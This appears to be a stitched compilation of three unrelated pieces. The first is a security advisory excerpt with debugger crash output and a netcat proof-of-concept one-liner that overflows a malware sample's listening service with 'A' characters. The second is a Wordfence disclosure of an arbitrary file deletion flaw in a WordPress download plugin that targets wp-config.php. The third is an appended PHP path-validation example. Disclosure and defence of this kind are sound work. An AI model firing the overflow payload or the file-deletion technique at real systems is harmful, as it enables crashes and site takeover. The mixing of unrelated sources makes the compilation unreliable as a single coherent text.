???<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for ywwqlwntubs.exe<br />*** ERROR: Module load completed but symbols could not be loaded for ywwqlwntubs.exe<br />Failed calling InternetOpenUrl, GLE=12029<br /><br />FAULTING_IP: <br />+26<br />41414141 ?? ???<br /><br />EXCEPTION_RECORD: 0019ee34 -- (.exr 0x19ee34)<br />ExceptionAddress: 41414141<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: ywwqlwntubs.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000008<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />+26<br />41414141 ?? ???<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+26<br />41414141 ?? 
???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />IP_ON_HEAP: 41414141<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />CONTEXT: 0019ee84 -- (.cxr 0x19ee84)<br />eax=00010000 ebx=04223c0c ecx=749feb0d edx=00000000 esi=010b0844 edi=02860d24<br />eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />41414141 ?? ???<br />Resetting default scope<br /><br />ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 41414141<br /><br />FAULTING_THREAD: ffffffff<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE<br /><br />PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_STACKIMMUNE<br /><br />DEFAULT_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE<br /><br />FRAME_ONE_INVALID: 1<br /><br />STACK_TEXT: <br />00000000 00000000 ywwqlwntubs.exe+0x0<br /><br /><br />STACK_COMMAND: .cxr 000000000019EE84 ; kb ; ** Pseudo Context ** ; kb<br /><br />SYMBOL_NAME: ywwqlwntubs.exe<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: ywwqlwntubs<br /><br />IMAGE_NAME: ywwqlwntubs.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19<br /><br />FAILURE_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE_c0000005_ywwqlwntubs.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_ywwqlwntubs.exe<br /><br />0:000> !exchain<br />000a1614: ntdll!ExecuteHandler2+44 (77729d70)<br />....<br />0019f2e4: 41414141<br />Invalid exception stack at 41414141<br /><br /><br 
/>Exploit/PoC:<br />C:\>python -c "print('DOS'+'A'*804)" | nc64.exe x.x.x.x 27374<br />connected. 22:22 - August 1, 2022, Monday, ver: Legends 2.1<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Description: Authenticated (Contributor+) Arbitrary File Deletion<br /><br />Affected Plugin: Download Manager<br /><br />Plugin Slug: download-manager<br /><br />Plugin Developer: W3 Eden, Inc.<br /><br />Affected Versions: <= 3.2.50<br /><br />CVE ID: CVE-2022-2431<br /><br />CVSS Score: 8.8 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: 3.2.51<br /><br />Download Manager is a popular WordPress plugin designed to allow site content creators to share downloadable files that are stored as posts. These downloads can be displayed on the front-end of the WordPress site for users to download. Unfortunately, vulnerable versions of the plugin contain a flaw in how the downloadable file path is stored and subsequently deleted upon post deletion that makes it possible for attackers to delete arbitrary files on the server.<br /><br />More specifically, vulnerable versions of the plugin register the deleteFiles() function, which is called via the before_delete_post hook. This hook is triggered right before a post is deleted, and its intended purpose here is to delete any files that were uploaded and associated with a “download” post.<br /><br />At first glance this looks like relatively safe functionality, assuming the originally supplied file path is validated. Unfortunately, that is not the case: the path to the file saved with the “download” post is not validated to ensure it is a safe file type or is located in a directory associated with “download” posts. This means that a path to an arbitrary file with any extension can be supplied via the file[files][] parameter when saving a post, and that path becomes the file associated with the “download” post. 
On many configurations an attacker could supply a path such as /var/www/html/wp-config.php, which would associate the site’s WordPress configuration file with the download post.<br /><br />When the user goes to permanently delete the “download” post, the deleteFiles() function is triggered by the before_delete_post hook and the supplied file is deleted, if it exists.<br /><br />This can be used by attackers to delete critical files hosted on the server. The wp-config.php file in particular is a popular target for attackers, as deleting it disconnects the existing database from the compromised site and allows the attacker to re-run the initial installation process and connect their own database to the site. Once a database is connected, they would have access to the server and could upload arbitrary files to further infect the system.<br /><br />This vulnerability requires contributor-level access or above to exploit, so it serves as an important reminder not to grant contributor-level or higher access to untrusted users. It is also important to verify that all users have strong passwords, so that an unauthorized actor cannot gain the access needed for a vulnerability like this through a weak or compromised password.<br /><br />Timeline<br /><br />July 8, 2022 – Discovery of the Arbitrary File Deletion Vulnerability in the “Download Manager” plugin. A firewall rule is released to Wordfence Premium, Wordfence Care, and Wordfence Response users. We attempt to initiate contact with the developer.<br /><br />July 26, 2022 – After no response from the developer, we send the full disclosure details to the WordPress plugins team. They acknowledge the report and make contact with the developer.<br /><br />July 27, 2022 – A fully patched version of the plugin is released as version 3.2.51.<br /><br />August 7, 2022 – Wordfence free users receive the firewall rule.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “Download Manager” plugin that makes it possible for authenticated attackers to delete arbitrary files hosted on an affected server, which could lead to remote code execution and ultimately complete site compromise. This flaw has been fully patched in version 3.2.51.<br /><br />We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 3.2.53 at the time of this publication.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response received a firewall rule on July 8, 2022 to provide protection against any attackers trying to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on August 7, 2022.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care.<br />If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.<br /><br /></code></pre>
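The validation missing from the vulnerable deleteFiles() handler, shown as an added PHP example that is neither the plugin's code nor the vendor's actual patch: the stored path is canonicalised and must resolve inside the plugin's own upload folder and carry an allowed extension before unlink() runs. The meta key dm_example_file, the folder name dm-example-files and the extension list are assumptions made for this illustration.

```php
<?php
// Added example, not Download Manager's own code or its vendor's fix: a
// before_delete_post handler that only unlinks files which resolve inside the
// plugin's own upload folder and carry an allowed extension.
// Meta key, folder name and extension list are assumptions for illustration.

/**
 * True only if $path names an existing regular file that, after symlink and
 * "../" resolution, sits under $base_dir and has an extension in $allowed_ext.
 */
function dm_example_is_safe_download_path(string $path, string $base_dir, array $allowed_ext): bool
{
    $real_base = realpath($base_dir);
    $real_path = realpath($path);
    if ($real_base === false || $real_path === false) {
        return false; // upload folder missing, or the file does not exist
    }
    // Trailing separator so "uploads/dm-example-files-evil/x" cannot match the base
    $real_base = rtrim($real_base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real_path, $real_base, strlen($real_base)) !== 0) {
        return false; // e.g. /var/www/html/wp-config.php is outside the folder
    }
    if (!is_file($real_path)) {
        return false; // never unlink directories or special files
    }
    $ext = strtolower(pathinfo($real_path, PATHINFO_EXTENSION));
    return in_array($ext, $allowed_ext, true);
}

/**
 * Hook body. Requires WordPress (wp_upload_dir, get_post_meta, add_action);
 * 'dm_example_file' is a hypothetical meta key standing in for the path the
 * plugin stores from its file[files][] parameter.
 */
function dm_example_delete_files(int $post_id): void
{
    $base    = wp_upload_dir()['basedir'] . '/dm-example-files';
    $allowed = ['zip', 'pdf', 'png', 'jpg', 'txt'];
    foreach ((array) get_post_meta($post_id, 'dm_example_file', false) as $file) {
        if (is_string($file) && dm_example_is_safe_download_path($file, $base, $allowed)) {
            unlink(realpath($file));
        }
        // Anything that fails the check is left alone; a rejected path is worth logging
    }
}
add_action('before_delete_post', 'dm_example_delete_files');
```

The path check is pure PHP and can be exercised from the CLI against a temporary directory; only dm_example_delete_files() needs a running WordPress.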